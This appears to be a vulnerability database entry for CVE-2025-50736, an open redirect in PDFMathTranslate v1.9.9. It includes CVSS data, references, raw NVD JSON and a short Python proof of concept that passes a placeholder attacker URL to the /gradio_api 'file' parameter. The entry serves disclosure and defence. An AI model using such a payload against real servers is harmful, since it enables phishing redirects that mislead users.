CVE-2025-50736

Description

An open redirect vulnerability exists in Byaidu PDFMathTranslate v1.9.9 that allows attackers to craft URLs that cause the application to redirect users to arbitrary external websites via the file parameter to the /gradio_api endpoint. This vulnerability could be exploited for phishing attacks or to bypass security filters.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Byaidu PDFMathTranslate v1.9.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-50736 Open Redirect PoC
# Target: Byaidu PDFMathTranslate v1.9.9
# Endpoint: /gradio_api
# Parameter: file

target_url = "http://target-server/gradio_api"
malicious_redirect = "http://attacker-controlled-site.com"

# Construct the malicious URL with open redirect payload
params = {
    "file": malicious_redirect
}

# Send request to trigger redirect
response = requests.get(target_url, params=params, allow_redirects=False)

# Check if redirect header is present
if response.status_code in [301, 302, 303, 307, 308]:
    location = response.headers.get('Location')
    print(f"[+] Open Redirect Confirmed!")
    print(f"[+] Redirects to: {location}")
    if malicious_redirect in location:
        print("[+] Vulnerability Confirmed: Redirects to attacker-controlled domain")
else:
    print("[-] No redirect detected")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-50736
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-50736
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-50736/
[4] VulDB https://vuldb.com/cve/CVE-2025-50736
[5] https://github.com/fai1424/Vulnerability-Research/tree/main/CVE-2025-50736
[6] https://pdf2zh.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-50736", "sourceIdentifier": "[email protected]", "published": "2025-10-30T14:15:43.393", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An open redirect vulnerability exists in Byaidu PDFMathTranslate v1.9.9 that allows attackers to craft URLs that cause the application to redirect users to arbitrary external websites via the file parameter to the /gradio_api endpoint. This vulnerability could be exploited for phishing attacks or to bypass security filters."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/fai1424/Vulnerability-Research/tree/main/CVE-2025-50736", "source": "[email protected]"}, {"url": "https://pdf2zh.com/", "source": "[email protected]"}]}}